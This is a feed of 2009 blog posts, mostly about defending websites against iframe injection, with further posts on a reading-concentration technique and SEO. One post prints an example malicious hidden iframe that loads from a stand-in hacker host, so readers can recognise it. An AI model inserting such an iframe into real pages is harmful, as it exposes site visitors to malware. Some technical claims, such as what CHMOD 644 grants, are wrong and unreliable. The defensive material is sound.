CHMOD 444, after an iframe injection attack, and are fairly sure your website is clean, then chances are you may not be a victim of iframe injection obfuscated (escaped) javascript code. One must not forget though, that no website will ever be 100% secure which is why we must always practise preventative measures.<br /><br />It is also important to remember that not all iframes are bad. Before you remove a suspected iframe, make sure it is not relevant to your web page. You might want to download a copy of the web page before you do any deleting just to be sure if your are not certain.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com1tag:blogger.com,1999:blog-2868164930975704250.post-74580404788037974982009-10-30T11:58:00.000-07:002009-10-30T12:05:25.549-07:00Using Your Maximum ConcentrationWhenever I am working with my websites, I always put myself into a state of maximum concentration which I learned from my Photoreading course that I had taken. This is very critical when you are implementing changes to your website. You must give it your full concentration or else you could make mistakes that could hinder the operation of your website.<br /><br /><strong>The Tangerine Method</strong><br /><br />To best read any material, one must first create the relaxed, alert state of body and mind essential for proper reading. When a person is relaxed and alert while reading, he/she is more likely to be faster, more fluent, and less distracted. He/she will be more able to comprehend, retain and recall what is read. One way to do this is to use the "Tangerine Technique".<br /><br />Using the Tangerine technique, a reader can quickly and easily establish a relaxed state of alertness. It also automatically directs a person's available unit of attention. The result is an immediate improvement in reading skills. The Tangerine technique helps locate and maintain the ideal point of attention for reading.<br /><br />The Tangerine technique is as follows:<br /><br />1) Use your hand to reach out in front of you and pick up an imaginary tangerine. Imagine its color, skin texture, and maybe even the sweet, tangy smell. Then, lob it from hand to hand to sense its weight.<br /><br />2) With your dominant hand, position the imaginary tangerine on the upper-rear portion of your head. Touch that area gently with your hand and imagine the tangerine floating a couple of inches above your head. Bring your hand down and relax your shoulders completely. Pretend this magical tangerine always stays there no matter how your head moves.<br /><br />3) Close your eyes and let the tangerine balance where you left it. Notice what happens to your physical and mental state as you do this. You will feel relaxed and alert. With your eyes still closed, imagine your field of vision opening up.<br /><br />4) Maintain the relaxed feeling of alertness as you open your eyes<br /><br />By playing with this technique, you will navigate reading material with increased speed and fluency. Your ability to concentrate on the information improves and reading becomes more relaxing. For the first while, you will have to consciously place the tangerine just behind and above the back of your head. Soon it becomes an automatic (unconscious) process so that whenever you approach reading materials, the imaginary tangerine floats into place.<br /><br /><strong>Your Ideal Reading State</strong><br /><br />Below is an 8 step method you can use before you read any type of reading material by entering into your Ideal Reading State.<br />It will help you to better understand and retain the information that you read. It incorporates the tangerine method.<br /><br />1) Place the reading material in front of you but do not read it yet.<br /><br />2) Begin to relax by taking a deep breath in and closing your eyes. Become aware of yourself from head to toe. Your spine is erect, your posture is comfortable, and your breathing is relaxed.<br /><br />3) Mentally state to yourself your purpose for reading. Why are you reading the material? What information do you plan to get out of the material? What is your purpose, your goal for reading this material? Give yourself these positive affirmations.<br /><br />4) Now enter your ideal state of mind by establishing your point of attention, by mentally placing the tangerine on the top back of your head. Once there, do not worry about keeping it in place. It will stay there by itself.<br /><br />5) Become aware of yourself as relaxed and alert.<br /><br />6) Bring a slight hint of smile to the corners of your eyes and the corners of your mouth to relax your face.<br /><br />7) Imagine your visual field opening up. You have a direct eye mind connection. You do not see one word at a time but many words, or maybe even the whole sentence.<br /><br />8) Now, at a rate that is comfortable to you, maintaining this state of relaxed alertness, gently open your eyes, and begin reading.<br /><br />You will be amazed at the results.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-47778780051422815932009-10-19T12:04:00.000-07:002009-10-19T12:25:19.664-07:00Using File Permissions To Combat iFrame InjectionsAfter posting my article on "<strong>Measures to Prevent and Detect iFrame Injection Attacks</strong>", I started to notice that many other people on the internet were linking to my article. They obviously felt that it was indeed an important weapon against combatting iframe injections.<br /><br />As my article grew in popularity, I started to notice that iframe injection attacks against my website started to increase. I guess I was making some people very unhappy. As my website is constantly being monitored, I was able to react and remove these iframe injections almost immediately.<br /><br />It soon occured to me that perhaps the file permissions on my web pages needed to be beefed up, made more restrictive.<br /><br />As per my post on "<strong>Website Protection and Security Using File and Directory CHMOD</strong>", most website file permissions are:<br /><br />Files: 644<br />Folders: 755 (with index page in it)<br />Images: 644<br />CGI scripts: 755<br />Php scripts: 644<br /><br />Since iframe injections attack your index.* webpages, the CHMOD 644 may not be enough to protect them. CHMOD 644 gives you, the user, all read, write and execute permissions and everybody else only read and execute permissions. You would think that this should be enough to prevent an iframe injection. Unfortunately, it is not.<br /><br />In my article on "<strong>Website Protection Against iFrame Injections</strong>", hackers may be attacking your website via a virus that they may have downloaded to your computer without you realizing it. Even though you change passwords, and remove the iframes, you may still be vulnerable to iframe injections. This virus could be sneaky enough such that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials. The result will be the same as a user logging into the website and thus will be able to write (modify) to the web page, adding the iframe injection. What we need to do then is to prevent writing to the web page. We need to change the web page file permission or CHMOD value.<br /><br />The CHMOD capability depends on two conditions:<br /><br />1) The server you are connected to must support the CHMOD command.<br />2) You must have access rights to change the attributes of that remote file or directory.<br /><br />Make sure these two conditions are fulfilled.<br /><br />It is also important to remember that you can set any non-script file to anything you like. You do not however want to set a directory or script to anything but CHMOD 755 if you want it to be able to run (for obvious security reasons). Only the owner of a file or root may change the permissions on a file no matter what its current permissions maybe.<br /><br />Since the iframe injection attacks are against the index.* web pages, we need to prevent modifications of these web pages. Now suppose you have just finished modifying your index.html and you did not want anybody to update or to delete it. Then, give the web page file permission CHMOD 444 and it will have this effect. This gives everybody, including the owner (user), only read capability. If the owner turns off the write permission, the file is protected from accidental destruction. This is a pretty secure way to store HTML files when they are not being currently edited.<br /><br />If you set file permission CHMOD 444 via FTP, then you may find that your host does not allow CHMOD 444 to be set via FTP - and even though you think you've changed to 444, it reverts back to 644. You may have to set CHMOD 444 via your host CPanel in a browser. Make sure you check this out. If you entered your site via FTP, edit your index.html file by adding a small change and then removing it. When you try to save the file, you should not be allowed to over-write it.<br /><br />Once you have changed file persmission to CHMOD 444 on your web page, ensure that it still functions and runs properly. Whenever you need to edit your index.html page, simply change back to CHMOD 644, do your changes, and then change again to CHMOD 444.<br /><br />Having to change file permissions everytime you need to edit a web page might feel a bit tedious. Preventing iframe injections to your website which could classify you as a risk site by Google, and hence, stop all traffic to your website, is well worth the extra few minutes needed to edit a web page via the CHMOD command.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-90121471227763814862009-10-15T19:40:00.000-07:002009-10-15T21:18:21.285-07:00Modifications To The iFrame Scanner Tool FileIf you have read the article, "<strong>Measures to Prevent and Detect iFrame Injection Attacks</strong>", then these little additons to the "<strong>detect-signature.php</strong>" iframe scanner file, will help give some order to your scanning, especially if you are doing hourly scanning on a 24 hour basis.<br /><br /><div><div><div><div><div><div><div><div><div><div><div>The following javascripts were available for free on the internet and I used them for my file, which helped to keep things in perspective.</div><div><br />All these javascripts are to be put between the body tags of the file, [body] and [/body].</div><div><br /></div><div><strong>Note:</strong> Due to Blog restrictions, the normal HTML brackets < > were replaced with [ ].</div><div><br />The following javascript will print the date on the file display web page. Put it right after the [body] tag.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGD_26-wXJnXJ84n9pwPuSB6mdzxkeeImq_wJt34xpjeTc01HPryf7Vfd1M0B4ThjPzP8LToQ3aofj30M2DRx6SZ9U76UKfQkB6PpSX6LUQ2mQuvAd4zMd-P4X_fPoL0l3L9_rhW0fO_sJ/s1600-h/date-1.jpg"><img id="BLOGGER_PHOTO_ID_5393038290433032306" style="WIDTH: 400px; CURSOR: hand; HEIGHT: 194px" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGD_26-wXJnXJ84n9pwPuSB6mdzxkeeImq_wJt34xpjeTc01HPryf7Vfd1M0B4ThjPzP8LToQ3aofj30M2DRx6SZ9U76UKfQkB6PpSX6LUQ2mQuvAd4zMd-P4X_fPoL0l3L9_rhW0fO_sJ/s400/date-1.jpg" border="0" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZO_QLTg63CfNmxQaJa0zhSUU5TKCjGrA2z9SHJxLs_mNZe1rnHo-XoQWiVkaNiYYk23LfBOXCmtNT_YQ_NWEUwQxIXn-DGz1elN2nDAk_kgtiWliw8DCEzu99haI7ssM_BJ4OPA-1431R/s1600-h/date-2.jpg"><img id="BLOGGER_PHOTO_ID_5393038469397806818" style="WIDTH: 400px; CURSOR: hand; HEIGHT: 106px" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZO_QLTg63CfNmxQaJa0zhSUU5TKCjGrA2z9SHJxLs_mNZe1rnHo-XoQWiVkaNiYYk23LfBOXCmtNT_YQ_NWEUwQxIXn-DGz1elN2nDAk_kgtiWliw8DCEzu99haI7ssM_BJ4OPA-1431R/s400/date-2.jpg" border="0" /></a><br />The following javascript will print the time on the file display web page. Put it right after the previous date javascript. </div><div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKB4yXUKru1yiXKf5TydbJohbdnLxGAbfr3XZGJtdBf7rupnJGbBy8AeoJCW67QQoU6izBkx8szwJrdPY022fgAFnkGmrS_xlXZuolKiQljsjzWCQ3B1LUfTEuk6UUDlWlxo3_p2mVsEMl/s1600-h/Time-1.jpg"><img id="BLOGGER_PHOTO_ID_5393041797302824386" style="WIDTH: 323px; CURSOR: hand; HEIGHT: 400px" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKB4yXUKru1yiXKf5TydbJohbdnLxGAbfr3XZGJtdBf7rupnJGbBy8AeoJCW67QQoU6izBkx8szwJrdPY022fgAFnkGmrS_xlXZuolKiQljsjzWCQ3B1LUfTEuk6UUDlWlxo3_p2mVsEMl/s400/Time-1.jpg" border="0" /></a></div></div><div>You can also add a "close" button to close the web page after you view it.</div><div><br />If you press the close button, and are using IE 7.0, it will give you a pop up window that says:</div><div><br />"The webpage you are viewing is trying to close the window"</div><div><br />This happens becuause you opened the window via a hyperlink from a parent window. It is a browser security measure. Basically, if you did not open the window using javascript, you can't close it using javascript.</div><div><br />All you need to do to counteract this is put a javascript code in before the close button script.<br /><br />Put these codes near the end of the file, just before the [/body] tag. </div><div><br /></div></div><div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLWzFfKOQjvyu31XOVuv0LnW-EATz681i1XXtXhd-uGHPgUFJXqRgRtl3IarcrUJYFk9zw41TLDghspBsWc_jR6UgY1OoxJE2AgRQqEPCqFxEBYoOUiu0RLeyFokDZ1TsdyoToGyupFXfn/s1600-h/close+button.jpg"><img id="BLOGGER_PHOTO_ID_5393045930575762482" style="WIDTH: 400px; CURSOR: hand; HEIGHT: 161px" alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLWzFfKOQjvyu31XOVuv0LnW-EATz681i1XXtXhd-uGHPgUFJXqRgRtl3IarcrUJYFk9zw41TLDghspBsWc_jR6UgY1OoxJE2AgRQqEPCqFxEBYoOUiu0RLeyFokDZ1TsdyoToGyupFXfn/s400/close+button.jpg" border="0" /></a><br /></div><div>In case you suffered from an iframe injection attack, you will be able to know, very closely, the date and time of the attack. This is very critical to know if you are to avoid your website being classified as a potential risk site. The sooner you react to the attack, the less the chance of being classified as a malware or badware site by Google.</div><div></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKB4yXUKru1yiXKf5TydbJohbdnLxGAbfr3XZGJtdBf7rupnJGbBy8AeoJCW67QQoU6izBkx8szwJrdPY022fgAFnkGmrS_xlXZuolKiQljsjzWCQ3B1LUfTEuk6UUDlWlxo3_p2mVsEMl/s1600-h/Time-1.jpg"></a></div></div></div></div></div></div></div></div></div></div></div>Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-91292579937006048592009-10-13T15:25:00.000-07:002009-10-13T16:31:20.336-07:00Measures to Prevent and Detect iFrame Injection AttacksIFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. The following is an example of a malicious iframe injection code:<br /><br />iframe src="<a href="http://www.example-hacker-site.com/inject/?s=some-parameters">http://www.example-hacker-site.com/inject/?s=some-parameters</a>" width="1" height="1" style="visibility: hidden" /iframe<br /><br />The iframe tag is an HTML tag used to seamlessly embed content from another page or site. (The “i” in “iframe” stands for “invisible”, i.e. “invisible frame”.) IFrames are used on thousands and thousands of sites, because that’s what Google uses for its AdSense ads — the little bit of JavaScript you paste on your page eventually ends up inserting an iframe into the HTML of your page.<br /><br />Like most useful things, iFrames can be used for good or for bad.<br /><br />An iframe injection is an injection of one or more iframe tags into a page’s content. The iframe typically does something bad, such as downloading an executable application that contains a virus or worm in it… something that compromises a visitor’s system.<br /><br />Typically, all your index.* files in your server are infected with a piece of code that loads a hidden iframe in the page. Examples of these pages are:<br /><br />index.htm<br />index.htmi<br />index.shtml<br />index.php<br /><br />The intent of this article is to show what preventative measures you can use to prevent or detect iframe injection attacks to your website.<br /><br /><strong>STEP 1</strong><br /><br />The first thing you need to do is to check with Google to see if your site is listed as suspicious. You can do this by using the following link:<br /><br /><a href="http://www.google.com/safebrowsing/diagnostic?site=http://yourdomain_name">http://www.google.com/safebrowsing/diagnostic?site=http://yourdomain_name</a><br /><br />Before you use the link, you need to replace "yourdomain_name" with your actual website name.<br /><br />Google will tell you if your website is suspicious or not.<br /><br />You can also go to the following website and enter your "<a href="http://www.yourdomain_name/">www.yourdomain_name/</a>". It will advise you on your website status.<br /><br /><a href="http://www.unmaskparasites.com/">http://www.unmaskparasites.com/</a><br /><br />STEP 2<br /><br />If you have suffered an iframe injection attack you need to act fast. If the security of your website is compromised, it can affect the search engine rankings of your website. Besides, it may pave way for more sophisticated attacks. Google will mark your site in it’s search results with a warning: “<span style="color:#ff0000;">This site may harm your computer</span>”. If a visitor sees the message “This site may harm your computer” pop up when (s)he try to access your website/blog, (s)he may not return again and your traffic will go down to zero.<br /><br />I suggest that you read the article "<span style="color:#ff0000;"><strong>Website Protection Against iFrame Injections</strong></span>" which you can find in this Blog.<br /><br /><strong>STEP 3</strong><br /><br />If you have not suffered and iframe injection attack, then you can manually run some scripts which will test the index.* files on your website.<br /><br />One script you can use is called "clean.php" which you can download at:<br /><br /><a href="http://www.diovo.com/wp-content/uploads/2009/04/clean.php.txt">http://www.diovo.com/wp-content/uploads/2009/04/clean.php.txt</a><br /><br />Copy and paste this script into your text editor, such as notepad, and save the file as "clean.php"<br /><br />It is important to remember that when you create a web page, it is important to use a pure text editor such as Notepad or an editor designed to create web pages. Never use Word or a word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can create problems with web servers. Also, when you save the web page, ensure that it has the proper file extension, e.g., index.html, clean.php, etc.<br /><br />Before you can use the file, you need to change the following line in the script:<br /><br />$webpath ="Type your domain name here. Eg:http://www.diovo.com/"<br /><br />which will become:<br /><br />$webpath ="<a href="http://www.yourdomain_name/"><span style="color:#3333ff;">http://www.</span><span style="color:#ff0000;">yourdomain_name</span>/</a><br /><br />Where "yourdomain_name" is replaced with your actual domain name.<br /><br />In the script, the "s" parameter specifies the file name to search for and the "c" parameter specifies the text to search for inside the file.<br /><br />When you have pasted the above script into your notepad editor, made the change for your website name, save it as “clean.php”. Once you have saved the file, upload it to the root directory of your website.<br /><br />Now you need to create a URL that you will copy and paste into your browser as follows:<br /><br /><a href="http://www.yourdomain_name/clean.php?s=index.php&c=iframe">http://www.<span style="color:#ff0000;">yourdomain_name</span>/clean.php?s=index.php&c=iframe</a><br /><br />where "yourdomain_name" is replaced by your actual doamin name.<br /><br />The web page to be checked is given by “s=index.php” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.php injections.<br /><br />Since we also want to check our index.html type web pages, we create a different URL as follows:<br /><br /><a href="http://www.yourdomain_name/clean.php?s=index.html&c=iframe">http://www.<span style="color:#ff0000;">yourdomain_name</span>/clean.php?s=index.html&c=iframe</a><br /><br />The file to be checked is given by “s=index.html” and the text to be found is “c=iframe”. This will scan all your files and folders on your website for index.html injections.<br /><br />The URL will list all the ”index.php” or "index.html" files in your website and if any of the files contains the given string, it will print the part with the string. You can see that one file is infected by displaying the iframe script.<br /><br />Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So you will have to clean the files manually by deleting the iframe script.<br /><br />You should be able to see that you can use the “s” parameter to test any web page on your website for iframe injection. Simply put in the exact webpage as follows:<br /><br />s=webpage.ext<br /><br />You can thus create simple internet URL shortcuts that you can click on to check the required web pages.<br /><br />When the script tests for iframe injections, it is basically looking for the text "iframe" and so will display any web page that has the text "iframe". You need to ensure that the iframe being displayed is actually a malicious iframe, similar to the example shown previously. Sometimes it may be a legitimate iframe. Be absolutely sure before you delete it from your web page.<br /><br />The "clean.php" iframe injection tool is quite useful when testing individual pages. However, after your website starts to grow, you will need to have a URL link for every web page extension (ext) which starts to be a time consuming effort, having to check each individual web page for iframe injection.<br /><br />A website that gives a free script to test all the files on a website for iframe injection is given at the following link:<br /><br /><a href="http://www.websanity.co.uk/blog/2009/08/scan-website-files-for-iframe-injection.html">http://www.websanity.co.uk/blog/2009/08/scan-website-files-for-iframe-injection.html</a><br /><br />The file is called "detect-signature.php"<br /><br />When you have dowloaded the file, there are a couple of lines in the script that I suggest you change. This will help make the script more suitable for your website.<br /><br />Using your notepad editor, open the file. First locate the following line:<br /><br />define('IGNORE_EXTENSIONS',"<span style="color:#ff0000;">jpg pdf zip psd doc gif swf xls</span>"); // Ignore files of these types<br /><br />You will see that the file will ignore files with extensions jpg, pdf, zip, etc. You can add or delete files as you feel necessary.<br /><br />Next, locate the following line:<br /><br />define("IGNORE_BEFORE", strtotime(<span style="color:#ff0000;">'2009-08-01</span>') );<br /><br />The file will ignore any web pages created before August 1, 2009. You may want to change this to ensure all your website files are tested. You could simply change 2009 to 2008.<br /><br />You will be downloading the “detect-signature.php” as a zip file. After download, extract the file. Using the notepad editor, open the file and change the suggested lines to what suits your needs and re-save. Upload the file to the root directory of your website.<br /><br />To activate, you need to create the following URL for your domain:<br /><br /><a href="http://www.yourdomain_name/detect-signature.php">http://www.<span style="color:#ff0000;">yourdomain_name</span>/detect-signature.php</a><br /><br />You can either create a URL short cut or else copy and paste the URL into your browser. Put in your exact domain name for “yourdomain_name”.<br /><br />When the file is activated, it initially starts by checking every file and web page on your website, unless you have excluded it.<br /><br />Once the scan is complete, you have two more options you can use for scanning for iframe injection. You can either have the scan stop at the first error (iframe injection) or have it display all errors (all files and web pages with iframe injection). You can continuously click on any of the three links on the web page scan results.<br /><br />When you do find iframe injections, you need to evaluate if the iframe injection is of the malicious form as indicated previously. If it is, you need to remove it from your web page. Open up your web page with a notepad editor if you have entered your site via FTP, find the iframe injection, delete it and re-save your web page. If you have a complete up-to-date backup of your web page, you can just upload it to your website. It will over-write the web page with the iframe injection.<br /><br />What I like about this file is that it can check every web page on your website. Although the primary intent is to check all the index.* web pages, checking your other web pages is an added benifit as they might also be attacked. Just make sure that when ever you do find an iframe injection, it is really a malicious iframe.<br /><br /><strong>STEP 4</strong><br /><br />Having the ability to manually check for iframe injections goes a long way in helping keep your website secure. The final step now is to automate the iframe scanning in case you forget. This will be your constant watch dog.<br /><br />The best way to do this is to schedule the iframe scanning, say every hour. A nice free System Scheduler can be found at:<br /><br /><a href="http://www.splinterware.com/download/index.htm">http://www.splinterware.com/download/index.htm</a><br /><br />Once you have downloaded the System Scheduler, install it. We will schedule the file "detect-signature.php" on your website to run a scan every hour.As mentioned previously, there are three ways to run the file. We can check and display all files, check and display only errors, or, check and display errors only. The error is the iframe injection. We will use the 3rd option so we will need to use the following URL in the System Scheduler:<br /><br /><a href="http://www.yourdomain_name/detect-signature.php?display_errors_only">http://www.<span style="color:#ff0000;">yourdomain_name</span>/detect-signature.php?display_errors_only</a><br /><br />When the file runs, it will show any iframe infected files. If you see errors, you need to take immediate action.<br /><br />We will now schedule the file. Open System Sceduler. Select the "Action" menu and then select "New Event", You should now be in the Event dialog box. For Event type you can leave "Run Application". Give the event a title such as "iFrame Injection Scan". In the Application box, input the complete URL to display errors only, with your actual domain name. In "Working Dir" put any directory on your computer. In "State" box, select Maximized.<br /><br />We now need to scedule when we want to run the scan. Select the "Scedule" tab. For "Scedule Type, select "Every Hour / Selected Minutes". In the left bottom boxes, select "Every Hour" and "On The Hour". This means the scan will run, e.g. at 1:00 pm, 2:00 pm, 3:00 pm, etc., for the daily 24 hour time frame. Now go to "Action" menu and Save and Exit. You should see the System Schedule icon in your right bottom tool bar. This icon must always be displayed in order for the event to run.<br /><br />Every hour on the hour, your web page will be activated and your website scanned for iframe injections. Look over the results and take action if necessary, otherwise close the web page. If you do not close the page, you will see multiple web pages of the same thing. You simply need to look them over and close them. If you are running the scan constantly over night, you will see the multiple web pages in the morning.<br /><br />You do not have to run every hour on the hour. You can select what ever time schedule you prefer. If you have been attacked, I strongly recommend you stay with hourly scanning.<br /><br />To help things be a bit clearer, I added the date and time in the "detect-signature.php" file so I knew the exact date and time, the scan was made. You can search the internet for java script that you can add. It is very easy to do and will give order to your scanning.<br /><br />STEP 5<br /><br />If you follow all the measures stated in this document, you will prevent your website from becoming a victim of iframe injection attacks. It is also important to note that your website may not be the only victim. Your home PC may also be a victim. You must also have preventative measures on your PC. Make sure you read the article "Website Protection Against iFrame Injections" as mentioned previously. This is a must.<br /><br />Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com1tag:blogger.com,1999:blog-2868164930975704250.post-35934071640313552282009-10-10T17:24:00.000-07:002009-10-10T20:08:03.401-07:00How To Submit Your Blogger Blog To Search EnginesAfter creating my blogs, I wanted to submit them to the major search engines in the same way as I did with my websites. I wanted to do a complete submission rather than just submit a URL that would have an unkown time for indexing, being added to the search engine directory.<br /><br />After submitting my blog, it then had to be verified. This could be done either by inserting a meta tag generated by the search engine webmaster or uploading a generated HTML page to the root directory of the blog. For my websites this was easy to do as I could just FTP to my site or modify my home page. For my blog it was a different matter since I really had no access other than posting, so I thought.<br /><br />Figuring I was not the only one with this problem, I surfed the net to see if anyone else was in a similar position. What I was able to finally determine was that on Blogger, I actually could modify my template, which in fact was my home page. By figuring out how to do this, I could add the verification meta tag required.<br /><br /><strong>To submit your blog to Google:</strong><br />Go to: <a href="https://www.google.com/accounts/ManageAccount">https://www.google.com/accounts/ManageAccount</a><br /><br />You first need to create an account if you do not have one.<br />You then select "Webmaster Tools" to add your website. Use menu on the left of the page.<br />Click on the "Add a site..." button and then enter the URL of your blog which should be something like:<br /><br /><a href="http://yourblogname.blogspot.com/">http://yourblogname.blogspot.com/</a><br /><br />Now click on the "Continue" button, and you will be shown what is called a Meta tag. This is shown in the "Verification method" drop down box. If it isn't, select it.<br /><br />You will see something similar to below:<br /><br />meta name="google-site-verification" content="IfUqWNCzBwC2qU87G8nGrOoIFq5RTF-Zwel8NTF6rk8"<br /><p>The meta tag is normally enclosed with <......./>. They have been omitted due to this blog's restriction but are needed.</p><p>The whole sentence above is your complete meta tag that you need to add to your blog template.</p>Now go to your blog and sign-in. You should end up at your Dashboard.<br />Click on "Layout" and then "Edit HTML" on top of the page. You should now see your home page template.<br /><br /><strong><span style="color:#ff0000;">You will notice at the top that you have the option to download your template before you modify it. It is strongly suggested that you do this just in case something goes wrong.</span></strong><br /><br /><p>Go to the HTML code and find the [ head ] tag . Using your keyboard create a blank line just below this tag.<br />Now go back to the webmaster page and copy the verification Meta tag completely, including the beginning and ending brackets <, />.</p><p>Go back to your template HTML code and paste the verification Meta tag in the blank line you had created. Click on "Save Template" and you are finished.</p><p>Finally, go back to the webmaster page and click on the "Verify" button. If all went well, your site should get verified.</p><p><strong>To Submit your blog to Yahoo:</strong></p><p>Go to: <a href="https://siteexplorer.search.yahoo.com/submit">https://siteexplorer.search.yahoo.com/submit</a> </p><p>You first need to create a Yahoo ID if you do not have one. You can then add your website.</p><p>As was described for Google submission, you will also need to add a Yahoo authentication Meta tag to your blog template. Choose the option "By adding a Meta tag to my home page". As before you will need to copy and paste it.</p><p>I found one problem with the Yahoo verification Mega tag when I tried to add it to my template. The Yahoo Meta tag was enclosed with the brackets <, >. To be properly saved in the template the meta tag must be enclosed with the brackets <strong><span style="color:#ff0000;"><, /></span></strong> in order to work properly. The end bracket was not preceeded with the / as required.</p><p>As before, sign-in to your blog, click "Layout" and then "Edit HTML". Download your template before you modify it.</p><p>Locate the tag [ head ]. Using your keyboard, create a blank line below this tag. If you had added the Google verification Meta tag, create the blank line below the Google tag. Copy and paste the Yahoo verification Meta tag in this blank line. <span style="color:#ff0000;">Do not forget to add the "/" to the end of the Meta tag bracket so that it becomes />. </span><span style="color:#000000;">Save your template and now you are finished.</span></p><p><span style="color:#ff0000;"><span style="color:#000000;">On your webmaster page click on the "Ready to Authenticate" button. If all goes well, your blog should get authenticated.</span></span></p><p><span style="color:#ff0000;"><span style="color:#000000;">By submitting your blogs to Google and Yahoo, you can keep checking your accounts and see when your blog does get indexed. For other search engines, you can follow the same steps as desribed for Google and Yahoo.</span></span></p><p><span style="color:#ff0000;"><span style="color:#000000;"><strong>Other Meta Tags</strong></span></span></p><p><span style="color:#ff0000;"><span style="color:#000000;">After my submissions to Google and Yahoo, I got to thinking about other Meta tags I could add to my blog template (home page) to help it get better noticed by the search engines.</span> </span></p><p><span style="color:#000000;">The following appear to be the most suggested Meta tags that should be used in your template:</span></p><p>- Description META Tag</p><p>- Keywords META Tag</p><p>When you create these Meta tags, insert them after any Verification or Authentication meta tags you may have added previously.</p><p>For help on adding website security, you can visit:</p><p><a href="http://www.websiteprotection.net/">http://www.websiteprotection.net/</a></p><p>If you are disillusioned or struggling with your current internet marketing campaign, you can get help by visiting:</p><p><a href="http://www.nichemarketingsecrets.net/">http://www.nichemarketingsecrets.net/</a></p><p>If you want a one-stop solution center with plenty of important and helpful information you can visit:</p><p><a href="http://www.schembrionics.com/">http://www.schembrionics.com/</a> </p><p></p><p></p>Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-15265427215668927262009-10-09T20:27:00.000-07:002009-10-09T21:00:44.715-07:00Tips on How to Increase Search Engine Page RankingHaving a website is no guarantee that people will visit, no matter how good your website may be. Your websites presence is very important to your survival. You need to get people to see, or hear about your website. This will increase your credibility and will increase your chances of having these visitors come back and possibly become leads.<br /><br />The following are some methods that I have used that have put my websites in the first 30 results of search engines such as Google, Yahoo, Bing (MSN), Altavisa and AllTheWeb, even though there was a heavy competition with other websites. Website ranking is about your position in the search engine results for a particular keyword.<br /><br /><strong>1. Submit Your Websites To Many Search Engines</strong><br /><br />You need to get your website indexed on as many search engines as possible. Most often this is free and very easy to do. If you can submit a sitemap with your submission, it will help make things easier. There are many free tools on the internet that will help you create a sitemap that you can submit. Take advantage of this.<br /><br />The following are links to 3 of the larger search engines. Many smaller search engines use these larger ones so that often, you will automatically be included with these also.<br /><br /><strong>Google:</strong> <a href="https://www.google.com/accounts/ManageAccount">https://www.google.com/accounts/ManageAccount</a><br />You first need to create an account. You then select "Webmaster Tools" to add your website. Use menu on the left of the page. When you have added your site, submit your sitemap under Site Configuration You will also need to verify your site by either a "META tag" or upload web page to your root directory which is all explained<br /><br /><strong>Yahoo:</strong> <a href="https://siteexplorer.search.yahoo.com/submit">https://siteexplorer.search.yahoo.com/submit</a><br />You first need to create a Yahoo ID. You can then add your website. Use the "Feeds" to submit your sitemap. You will also need to verify your site by either a "META tag" or upload web page to your root directory which is all explained<br /><br /><strong>Bing (MSN):</strong> <a href="http://www.bing.com/webmaster/">http://www.bing.com/webmaster/</a><br />You first need to create a new Windows Live ID Add your site and also submit your sitemap. You will also need to verify your site by either a "META tag" or upload web page to your root directory which is all explained<br /><br />Most search engine directories allow you to submit to their website for free. This will allow you to increase your web presence by being listed on another search engine, and it will also be a free link.<br /><br />It sometimes takes a while before your web pages become indexed, added to the search engine directory.<br /><br />You can check what pages are indexed by using the following website:<br /><br /><a href="http://www.selfseo.com/search_engines_index_report.php">http://www.selfseo.com/search_engines_index_report.php</a><br /><br /><strong>2. Content</strong><br /><br />Good content on your web pages is crucial to your website success. When creating your web page content, choose good keywords that relate to your site. Do not add hundreds of keywords or else this may be considered spam. Having about 25 keywords will make your site crawler friendly. Research what keywords people use most often on search engines that pertain to your products or services; use these keywords as text in the design to increase website traffic.<br /><br />Every 3 months or so, you should make a small change on each web page. Search engines like to see that changes are being made to a site and that it just isn't sitting there for years with no upgrades.<br /><br />Keep track of your search engine rankings. Once a website is indexed, you should go back and improve pages that didn't get high rankings on key words.<br /><br /><strong>3. Backlinks</strong><br /><br />To increase page rank rapidly, you have to get as many good quality links (backlinks) to your page that are relevant to the content of your page as you can. There are many ways to get links including, reciprocal linking with other sites, posting on blogs and forums, article marketing, and press releases just to name a few. <br /><br />I have found the most effective is to write articles and submit them to directories for publication distribution. In some cases, my articles have appeared before my website which helps in getting your website noticed earlier.<br /><br />In your author biography make sure you include a link to your website as well as links in your article to your website.<br /><br />I have found the following article submission locations very helpful in getting good backlinks:<br /><br /><a href="http://www.articler.com/">http://www.articler.com/</a><br /><br /><a href="http://www.goarticles.com/">http://www.goarticles.com/</a><br /><br /><a href="http://www.articlesbase.com/">http://www.articlesbase.com/</a><br /><br /><a href="http://ezinearticles.com/">http://ezinearticles.com/</a><br /><br /><a href="http://www.articlealley.com/">http://www.articlealley.com/</a><br /><br /><strong>4. META Tags</strong><br /><br />Make sure your META TAGS are done right. Create good Meta Tags. Each page should have different keywords in the Title and the Description Meta Tag. Limit the number of times that you repeat words in your Keyword Meta Tag. Place your important keywords at the top of the page as text headers. 